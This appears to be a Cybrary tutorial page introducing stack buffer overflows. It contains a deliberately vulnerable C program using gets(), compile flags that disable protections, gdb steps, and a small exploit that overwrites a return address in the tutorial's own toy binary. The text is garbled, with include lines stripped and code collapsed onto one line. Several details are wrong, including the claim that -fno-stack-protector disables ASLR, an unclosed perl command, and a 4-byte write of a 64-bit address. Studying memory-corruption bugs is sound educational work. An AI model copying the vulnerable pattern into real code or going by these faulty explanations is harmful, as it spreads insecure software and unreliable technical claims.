Ready to Start Your Career?

Tutorial: Basic Buffer Overflow

CryptoCodez s profile image
By: CryptoCodez
September 1, 2015
Tutorial: Basic Buffer Overflow - Cybrary// Hey guys, today, I will give you a brief introduction to buffer overflows on Linux x86_64 machines.// So, let's start with a basic example in C:______________________________________________________________________________________________________________// First some standard includes, you should now them...#include#include#include// we create a vulnerable functionint vulnFunction(int a, int b){// it creates a buffer with a size of 128 bytes! Yes, 128 not 125; it uses multiples of 8!char Buffer1[125];// now we get some input that could be greater than the buffergets(Buffer1);// and a pointer to the buffer will be returnedreturn strdup(Buffer1);}int main(){vulnFunction(0,1);}// This will never be called...void Unused(){printf("Hacked!");exit(0);}______________________________________________________________________________________________________________Compile using: gcc ./first_vuln.c -o first_vuln -fno-stack-protector -zexecstack-zexecstack is to change the read & write mode of the stack to executable-fno-stack-protector is for simplicity; it disables the randomization of the stack(called address space layout randomization = ASLR)Q: So, what happens if we give an input greater than the buffer?A: It overrides everything from the beginning of the buffer until buffer begins + length of input;Let's try it out:perl -e 'print "A"x220 | ./first_vuln#to much input...Yeah it crashes....Now we start gdb to find some values:gdb -q ./first_vulnDisassemble the Unused function to get its start addressdisas UnusedNow, you should search for something like thisDump of assembler code for function Unused:0x000000000040061c : push %rbp // this will be the new return address...The stack is built like this:riprbp registerbuffer[128]Ok, we have our info. We need 128bytes for the buffer and 8 for the rbp register. After that, the rip begins.We need to overwrite the complete buffer and the rbp register and append a new return address...#include#include#includeint main(char *argv[]){int i = 0;for (i=0;i<34;i++)printf("1337");unsigned RIP = 0x000000000040061c;//0x000000000040061c;fwrite(&RIP,1,4,stdout);return 0;}Simply compile the exploit and run it like this:./first_exploit | ./first_vuln Have fun, and maybe you should read some more tutorials on buffer overflows. Greets, AnonOverflow
Schedule Demo
Build your Cybersecurity or IT Career
Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry